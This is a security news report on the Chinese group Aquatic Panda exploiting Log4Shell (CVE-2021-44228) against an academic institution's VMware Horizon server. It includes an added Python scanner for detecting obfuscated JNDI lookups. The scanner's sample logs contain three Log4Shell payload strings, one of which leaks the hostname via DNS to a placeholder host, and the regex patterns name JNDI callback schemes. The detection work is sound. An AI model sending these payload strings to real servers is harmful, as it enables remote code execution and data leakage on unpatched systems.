Chinese Spies Exploit Log4Shell to Hack Major Academic Institution

China-linked cyberespionage group Aquatic Panda was recently observed exploiting the Log4Shell vulnerability to compromise a large academic institution, CrowdStrike’s Falcon OverWatch team reports.

Tracked as CVE-2021-44228 and also referred to as Log4Shell (and, by some, LogJam), the security hole affects the Apache Log4j 2 Java logging framework and has been exploited in targeted attacks since early December.

As part of a recent campaign, the OverWatch security researchers observed Aquatic Panda leveraging a modified version of the Log4j exploit for initial access, and then performing various post-exploitation operations, including reconnaissance and credential harvesting.

In their attempt to compromise the unnamed academic institution, the attackers targeted a VMware Horizon instance that employed the vulnerable Log4j library. The exploit used in this attack was initially published on GitHub on December 13.

Before moving further, the attackers performed connectivity checks: the Apache Tomcat service hosting the VMware Horizon instance was made to issue DNS lookups for an attacker-chosen subdomain, confirming that the injected lookup had been processed and that the server could reach attacker infrastructure. Other threat actors have likewise been observed using public DNS logging services to identify vulnerable servers, since a Log4Shell payload that triggers a DNS resolution is evidence of exploitability without requiring a successful JNDI class load.
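The "modified" exploit and the DNS-based connectivity check described above rest on the same mechanism: Log4j 2 resolves nested lookups such as `${lower:j}` or `${env:X:-j}` before evaluating the outer `${jndi:...}`, so payload variants that hide the literal string `jndi` still work, and the hostname in the resulting LDAP/RMI/DNS URL is what the victim resolves. The scanner below is an added example, not code from CrowdStrike's report or from this article: it collapses the common obfuscation forms, flags the JNDI lookup, and extracts the callback host so the hit can be matched against DNS query logs. The log lines are constructed for the example, the `.invalid` hostnames are placeholders, and the set of obfuscation forms handled is an assumption covering the widely seen variants rather than every Log4j lookup.

```python
"""Flag Log4Shell (CVE-2021-44228) JNDI lookup payloads in sample log lines.

Added example; not CrowdStrike's or SecurityWeek's code. Log4j 2 expands
inner lookups before the outer ${jndi:...} is evaluated, so a naive search
for "${jndi:" misses modified exploits. We normalise the common lookup
forms from the inside out, then match the JNDI lookup and pull out the
host that a DNS-based connectivity check would resolve.
"""
import re

# Lookup forms Log4j 2 resolves before the outer ${jndi:...} (assumed set).
_DEFAULT_FORM = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")            # ${x:y:-v} -> v
_CASE_FORM = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)     # ${lower:V} -> v
_SIMPLE_FORM = re.compile(r"\$\{([A-Za-z0-9_.]+)\}")                 # ${hostName} -> <hostName>
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:/*([^/\s}:]+)",
    re.I,
)


def deobfuscate(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookup obfuscation, innermost forms first.

    Each round rewrites the ${...} forms that contain no further nesting;
    we stop when a round changes nothing, or after max_rounds so odd input
    cannot make the scanner spin.
    """
    for _ in range(max_rounds):
        new = _DEFAULT_FORM.sub(r"\1", text)
        new = _CASE_FORM.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            new,
        )
        # Unresolvable context lookups (hostName, env, ...) become a placeholder;
        # they commonly appear in the host part to leak data via DNS.
        new = _SIMPLE_FORM.sub(r"<\1>", new)
        if new == text:
            break
        text = new
    return text


def find_jndi(line: str):
    """Return scheme, callback host and normalised line for the first JNDI
    lookup in a log line, or None if there is none."""
    normalized = deobfuscate(line)
    m = _JNDI.search(normalized)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "host": m.group(2), "normalized": normalized}


def scan(lines):
    """Scan log lines; return one hit per line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        hit = find_jndi(line)
        if hit:
            hit["line"] = number
            hits.append(hit)
    return hits


# Constructed access-log lines: three payload variants, then two benign lines.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /portal HTTP/1.1" 200 "${jndi:ldap://callback.example.invalid:1389/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.example.invalid/x}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:J}${env:NOPE:-n}di:ldap://${hostName}.dns.example.invalid/a}"',
    '10.0.0.8 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /?d=${date:yyyy} HTTP/1.1" 404 "curl/7.79"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['scheme']} callback to {hit['host']}")
        print(f"  normalised: {hit['normalized']}")
```

The extracted hosts are the values to search for in DNS query logs from the Tomcat or Horizon host: a resolution of that name shortly after the request is the connectivity check the article describes, whether or not the JNDI class load that follows succeeds.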

Next, Aquatic Panda executed multiple Linux commands on the Windows host running the Apache Tomcat service, including commands intended to deploy attacker tooling hosted on remote infrastructure.

The attackers performed reconnaissance from the host, seeking to better understand privilege levels and domain details, and also attempted to stop a third-party endpoint detection and response solution.

After deploying additional scripts, the hackers attempted to execute PowerShell commands to retrieve malware and three VBS files believed to constitute a reverse shell.

Aquatic Panda also made several attempts at credential harvesting by performing memory dumps and preparing them for exfiltration by compressing them.

The target organization was alerted to the suspicious activity immediately after detection and was able to quickly implement its incident response protocol, patching the vulnerable software and preventing further malicious activity.

Active since at least May 2020 and engaging in intelligence collection and industrial espionage, Aquatic Panda has been observed targeting organizations in the government, telecommunications, and technology sectors. The group’s toolset includes Cobalt Strike, the FishMaster downloader, and njRAT, among others.

Related: NVIDIA, HPE Products Affected by Log4j Vulnerabilities

Related: Chinese Government Punishes Alibaba for Not Telling It First About Log4Shell Flaw: Report

Related: Japan, Vietnam Look to Cyber Defense Against China

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
